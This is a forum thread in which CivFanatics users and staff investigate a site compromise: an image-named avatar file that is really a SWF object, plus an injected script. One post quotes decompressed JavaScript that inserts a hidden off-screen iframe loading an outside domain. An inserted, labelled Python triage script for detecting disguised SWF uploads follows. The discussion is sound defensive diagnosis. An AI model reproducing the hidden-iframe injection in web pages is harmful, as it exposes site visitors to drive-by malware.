Civfanatics problems

Unable to add cookies, header already sent.
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code
Line: 156

Same here. For me, I didn't need to restart my whole browser, I just hit Reload and it loaded fine. As far as I can tell, it only happens when I go to CFC for the first time after starting up FF. Each subsequent visit in the same session is fine.
 
Just received the same message myself entering the main site through a bookmarked link. Reloaded the page, got onto the site and when I logged in, it did it again and reloading allowed me to log in and use the site.
 
Same here.
Came to CFC via directly typing in the forums.civfanatics url.

NoScript indicates that additional JavaScript from halifaxid.com would normally have been loaded. -> not normal JavaScript for CFC.

EDIT:



That halifaxid entry hasn't been there before.
 

NoScript indicates that additional JavaScript from halifaxid.com would normally have been loaded. -> not normal JavaScript for CFC.

Doesn't seem to be always loaded.



Also:


The shockwave object is still there, seems to be related to the mentioned javascript file there.

EDIT: The shockwave flash is in /images/customavatars/test.jpg.
Does that mean the malicious code was introduced via a custom avatar o_O?

EDIT2: This image contains a compressed shockwave header, is therefore indeed a shockwave object.
 

EDIT: The shockwave flash is in /images/customavatars/test.jpg.
Does that mean the malicious code was introduced via a custom avatar o_O?

EDIT2: This image contains a compressed shockwave header, is therefore indeed a shockwave object.

-> after decompressing it (mind, I don't have any clue about shockwave), it seems that there's a frame in the shockwave, which itself loads an iframe from halifaxid.com

PHP:
createElement('div');
divTag.id='ADV-972';
document.body.appendChild(divTag);
var I972=document.createElement('iframe');
I972.width='659px';
I972.height='147px';
I972.style.position = 'absolute';
I972.style.left = '-7415px';
I972.setAttribute('src','http://halifaxid.com/?ts');
document.getElementById('ADV-972').appendChild(I972);
}

Not sure what this means, but it's definitely bad.

The image/swf-object should be deleted/moved/backed up, just in case, and it should be found out how it came on the server.


EDIT:
Only google hit for that specific domain is at a mailing list of viruswatch....
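
Added example, not part of the original posts and not vBulletin code: a triage check for the situation described above, an upload with an image extension whose first bytes are an SWF signature. It reads the 8-byte SWF header, inflates a zlib-compressed (CWS) body under a size cap, and lists the hosts referenced inside. The function names, file names and the `ads.example.invalid` host are constructed for illustration.

```python
import re
import struct
import zlib

# SWF signatures: the first three bytes identify the container and its compression.
SWF_MAGIC = {b"FWS": "none", b"CWS": "zlib", b"ZWS": "lzma"}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")
HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")
MAX_BODY = 16 * 1024 * 1024  # cap decompression so a crafted file cannot exhaust memory


def inspect_upload(name, data):
    """Return a finding if an image-named upload is really an SWF, else None."""
    if not name.lower().endswith(IMAGE_EXTS) or len(data) < 8:
        return None
    compression = SWF_MAGIC.get(data[:3])
    if compression is None:
        return None
    # Byte 3 is the SWF version, bytes 4-7 the little-endian uncompressed file length.
    version, declared_len = struct.unpack("<BI", data[3:8])
    body = data[8:]
    if compression == "zlib":
        try:
            body = zlib.decompressobj().decompress(body, MAX_BODY)
        except zlib.error:
            body = b""  # truncated or corrupt stream: still report the mismatch
    elif compression == "lzma":
        body = b""  # LZMA bodies are not unpacked here; the mismatch is still reported
    hosts = sorted({m.group(1).decode("ascii").lower() for m in HOST_RE.finditer(body)})
    return {"name": name, "compression": compression, "version": version,
            "length_ok": declared_len == 8 + len(body), "hosts": hosts}


def scan(files):
    """files: mapping of file name -> bytes. Returns findings for disguised SWF files."""
    return [f for f in (inspect_upload(n, d) for n, d in sorted(files.items())) if f]


# Constructed samples (not taken from the forum): one zlib-compressed SWF with an
# image name, one genuine JPEG header.
_body = b"\x00" * 12 + b"I.setAttribute('src','http://ads.example.invalid/?ts');"
SAMPLES = {
    "avatar_constructed.jpg": b"CWS" + bytes([9]) + struct.pack("<I", 8 + len(_body))
                              + zlib.compress(_body),
    "photo_constructed.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
}

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

On a server the same function would be fed the bytes of each file in the avatar upload directory; any finding means the file should be quarantined and its upload path reviewed.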
 
I have Internet Explorer 11. When I try to go to the Civfanatics website I see:

Unable to add cookies, header already sent.
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code
Line: 156

If I then open up the Civfanatics website in Chrome, I am able to open it up in IE as well. Is it my IE settings? Compatibility issues?

Moderator Action: Not a Civ5 issue. Moved to Site Feedback.

I get the same thing too. A quick fix for me is to simply refresh the webpage, I don't know if that works for anyone else.
 
Ok - thanks. Squashed a couple more.... Have alerted our hosts to do a more thorough review.

Great :).

You should remove the /clientscript/vbulletin_css/style-944ecf91-00003.js or disable it (or check what the heck it does), because it's still trying to load the swf object.
Okay, it can't anymore, gives an internal 404, but if that's removed, I guess the error message itself should also go away.
 
I get the same thing too. A quick fix for me is to simply refresh the webpage, I don't know if that works for anyone else.

Yeah works for me too.
 
Same error for me a few minutes ago, then retrying with a slightly different URL worked fine.
 
I can duplicate this by closing all browsers, open one, google civfanatics, click url.

It's obviously problem code in vBulletin itself or advertisement banners, probably assessing advertisement "effectiveness". When you refresh, you get different ad banners without the bad script.
 
Great :).

You should remove the /clientscript/vbulletin_css/style-944ecf91-00003.js or disable it (or check what the heck it does), because it's still trying to load the swf object.
Okay, it can't anymore, gives an internal 404, but if that's removed, I guess the error message itself should also go away.

Removed that last night. Bit I can't find is where the reference to it is being added at page load.
 
had to clear cookies by logging out:

Spoiler :
<script src="/clientscript/vbulletin_css/style-944ecf91-00003.js"></script>
<html xmlns="http://www.w3.org/1999/xhtml" dir="" lang="">
<head>


<title>Civilization Fanatics' Forums</title>

</head>
<body>


<br /><br /><br />


<table class="tborder" cellpadding="" cellspacing="" border="0" width="70%" align="center">
<tr>
<td class="tcat"></td>
</tr>
<tr>
<td class="panelsurround" align="center">
<div class="panel">
<div align="">


<!-- main error message -->


<div style="margin: 10px">Unable to add cookies, header already sent.<br />
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code<br />
Line: 157<br /></div>


<!-- / main error message -->


</div>
</div>
<!--
<div style="margin-top:px">
<input type="submit" class="button" value="" accesskey="s" onclick="history.back(1); return false" />
</div>
-->
</td>
</tr>
</table>

<br />


<!-- forum jump -->
<table cellpadding="0" cellspacing="0" border="0" align="center">
<tr>
<td></td>
</tr>
</table>
<!-- / forum jump -->


<br />



</body>
</html>
 
two more things going into the logs:

The requested URL /clientscript/vbulletin_css/style-944ecf91-00003.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Also the Google secure browsing API seems to be on to the site - as both goog-malware-shavar and goog-phish-shavar hash tags are sent along with the site request, which may cause trouble down the line if it does indeed identify this site as infected as I understand the descriptions (though I did not delve deeply enough into the API docs to know exactly what those actually mean).
 